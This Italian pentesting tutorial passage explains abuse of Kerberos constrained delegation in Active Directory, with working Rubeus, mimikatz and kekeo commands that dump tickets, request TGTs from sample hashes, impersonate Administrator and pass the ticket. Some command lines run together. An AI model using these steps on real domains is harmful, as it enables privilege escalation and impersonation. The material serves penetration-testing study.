Utilizzando questa tecnica, un amministratore di dominio può consentire a un computer di impersonare un utente o un computer nei confronti di un servizio di una macchina.
Servizio per l'utente stesso (S4U2self): Se un account di servizio ha un valore userAccountControl che contiene TRUSTED_TO_AUTH_FOR_DELEGATION (T2A4D), può ottenere un TGS per se stesso (il servizio) a nome di qualsiasi altro utente.
Servizio per il proxy dell'utente(S4U2proxy): Un account di servizio può ottenere un TGS a nome di qualsiasi utente per il servizio impostato in msDS-AllowedToDelegateTo. Per farlo, ha bisogno prima di un TGS da quell'utente a se stesso, ma può utilizzare S4U2self per ottenere quel TGS prima di richiederne un altro.
Nota: Se un utente è contrassegnato come "Account sensibile e non può essere delegato" in AD, non sarà possibile impersonarlo.
Ciò significa che se si compromette l'hash del servizio è possibile impersonare gli utenti e ottenere accesso a loro nome al servizio configurato (possibile privesc).
Inoltre, non si avrà solo accesso al servizio che l'utente è in grado di impersonare, ma anche a qualsiasi altro servizio, perché non viene controllato il nome SPN (il nome del servizio richiesto), solo i privilegi. Pertanto, se si ha accesso al servizio CIFS, si può anche avere accesso al servizio HOST utilizzando l'opzione /altservice in Rubeus.
Inoltre, l'accesso al servizio LDAP su DC è ciò che serve per sfruttare un DCSync.
# The first step is to get a TGT of the service that can impersonate others## If you are SYSTEM in the server, you might take it from memory.\Rubeus.exe triage.\Rubeus.exe dump/luid:0x3e4/service:krbtgt/nowrap# If you are SYSTEM, you might get the AES key or the RC4 hash from memory and request one## Get AES/RC4 with mimikatzmimikatzsekurlsa::ekeys## Request with aestgt::ask /user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05
.\Rubeus.exe asktgt /user:dcorp-adminsrv$ /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /opsec /nowrap
# Request with RC4tgt::ask/user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local/rc4:8c6264140d5ae7d03f7f2a53088a291d.\Rubeus.exe asktgt/user:dcorp-adminsrv$ /rc4:cc098f204c5887eaa8253e7c2749156f/outfile:TGT_websvc.kirbi
Ci sono altre modalità per ottenere un ticket TGT o il RC4 o AES256 senza essere SYSTEM nel computer, come il bug della stampante e la delega non vincolata, il relaying NTLM e l'abuso del servizio di certificazione di Active Directory.
Basta avere quel ticket TGT (o hash) per eseguire questo attacco senza compromettere l'intero computer.
Utilizzando Rubeus
#Obtain a TGS of the Administrator user to self.\Rubeus.exe s4u/ticket:TGT_websvc.kirbi/impersonateuser:Administrator/outfile:TGS_administrator#Obtain service TGS impersonating Administrator (CIFS).\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /outfile:TGS_administrator_CIFS
#Impersonate Administrator on different service (HOST).\Rubeus.exe s4u /ticket:TGT_websvc.kirbi /tgs:TGS_administrator_Administrator@DOLLARCORP.MONEYCORP.LOCAL_to_websvc@DOLLARCORP.MONEYCORP.LOCAL /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /altservice:HOST /outfile:TGS_administrator_HOST
# Get S4U TGS + Service impersonated ticket in 1 cmd (instead of 2).\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.local" /user:dcorp-adminsrv$ /ticket:TGT_websvc.kirbi /nowrap
#Load ticket in memory.\Rubeus.exe ptt/ticket:TGS_administrator_CIFS_HOST-dcorp-mssql.dollarcorp.moneycorp.local
kekeo + Mimikatz
#Obtain a TGT for the Constained allowed usertgt::ask/user:dcorp-adminsrv$ /domain:dollarcorp.moneycorp.local/rc4:8c6264140d5ae7d03f7f2a53088a291d#Get a TGS for the service you are allowed (in this case time) and for other one (in this case LDAP)tgs::s4u /tgt:TGT_dcorpadminsrv$@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLAR CORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorpdc.dollarcorp.moneycorp.LOCAL
#Load the TGS in memoryInvoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_ldap~ dcorp-dc.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL_ALT.kirbi"'